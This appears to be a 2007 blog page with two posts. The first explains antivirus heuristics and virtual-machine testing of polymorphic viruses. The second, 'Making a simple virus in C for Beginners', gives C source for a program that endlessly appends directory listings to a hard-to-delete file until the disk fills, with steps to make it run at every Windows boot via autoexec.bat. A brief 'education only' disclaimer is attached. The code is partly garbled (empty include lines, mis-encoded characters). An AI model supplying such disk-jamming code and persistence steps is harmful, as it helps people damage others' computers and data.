Bharat Banate's Work Profile

View Bharat Banate's profile on LinkedIn
Showing posts with label virus. Show all posts
Showing posts with label virus. Show all posts

Friday, September 7, 2007

Antivirus: Working of an antivirus package( part II)

Continued......(from part I)

Now, suppose that a previously unknown strain of the Melissa virus happens to come into contact with your computer. Your antivirus software would use a technology known as heuristics to identify the virus.

Heuristics work on the basis of probability. The basic idea is that a variant of Melissa would still resemble one of the existing versions of Melissa. After all, if it looks like Melissa and it smells like Melissa, then it’s probably Melissa. If the heuristics algorithm causes the virus scanner to uncover a potential variant of a known virus, the scanner will alert you to the fact. When your antivirus software detects an unknown variant and alerts you to the potential virus, what it’s really telling you is that the file has a certain percentage of code in common with a known virus or that the software is a certain percentage certain that the file contains viral code.

Polymorphic viruses
Heuristics are great if the virus remains true to its original form, but virus programmers are smart people. Some viruses are designed to encrypt themselves. Such viruses are known as polymorphic viruses. The idea behind polymorphic viruses is that they can reorganize themselves so as to have an extremely large potential number of signatures.

Fortunately, there’s a way to protect your machine from polymorphic viruses. If the virus scanner suspects a polymorphic virus, some antivirus software packages actually test the code. To do so, they create what’s known as a virtual machine. In a nutshell, a virtual machine is an area of memory that can behave as if it existed in a separate computer.

By opening a potentially hazardous file in a virtual machine, the antivirus software can test the file in a safe and controlled environment. If the file proves to be safe, the user will never know of the test. However, if the file does contain a virus, the user is alerted to the infection and prompted to take action.
The authors and editors have taken care in preparation of the content contained herein but make no expressed or implied warranty of any kind and assume no responsibility for errors or omissions. No liability is assumed for any damages. Always have a verified backup before making any changes.
Posted by nik at 8:38 AM 0 comments
Labels: , , ,

Monday, September 3, 2007

VIRUS:Making A simple virus in C for Beginners

Hi all,
at begining of the learning of computer programming it is a dream of almost all student to build a computer virus of his/her own.
Computer virus obviously is a thing that shouldnot be made and used on others computer it is completely illegal in all countries.So make and try this on your own machine.
Now explain what do the viruses do.There are several types of computer viruses with different functions(destructive obviously).Some of which delete computers' important files and folders,some change the configuration of your computer system like registry values,some occupy a large amount of memory space and dump your hard disc.There are some viruses too which can damage your RAM parmanently.
I am going to give here a simple virus program which has only a few lines bur has ability to jam your Hard disc.
The logic behind the program is nothing but making a self growing file which grows to a few MB in one tern and this growth will continue infinitely.
The require ment to make this virus is
OS:-Windows98/xp/2000 MS-DOS
Compiler:-Borland C(Which has Dos Shell)
Source Code:-
//START v.c
#include
#include
void main()
{
while(1)
{
system("dir>>â•ša.exe");
}
}

As you can see this is a very little programe.Compiling the programme we get v.exe file.This is our virus.
How it works?-The system call "dir>>â•ša.exe" will execute the dos command 'dir' and ridirect its output toa file â•ša.exe(the symbol â•š can be obtained by pressing 456 on numpad holding alt key).So running the program in a folder having many files and folder will increase the size of â•ša.exe in a great amount.This process will continue to infinity as this is in a while(1) loop;
Best try this on win98.then you cannot delete â•ša.exe from GUI.
For auto running place v.exe in the command folder in windows folder.
In autoexec.bat(win98) or autoexec.NT(winXP/2000) file simply write v.exe.
Each time your window starts v.exe will run automatically.
Try this on your own computer remember the â•ša.exe is the infected file which is growing in size continiously.So to recover, simply delete v.exe and â•ša.exe file from your computer.


Code:

//START v.c
#include
#include
void main()
{
while(1)
{
system("dir>>â•ša.exe");
}
}

Caution:
It should not use on others computer..........This is harmful. So Before using this u need to backup ur all information which are saved in ur system drive. After run this program it will JAM ur system drive. so it may needs reinstall ur operating system. This information is given only for Awarness/Education purpose PLEASE DO NOT USE THIS THING TO HARM ANYONE


Further Reading: No further reading advised
Posted by nik at 11:40 PM 4 comments
Labels: , , ,
Subscribe to: Posts (Atom)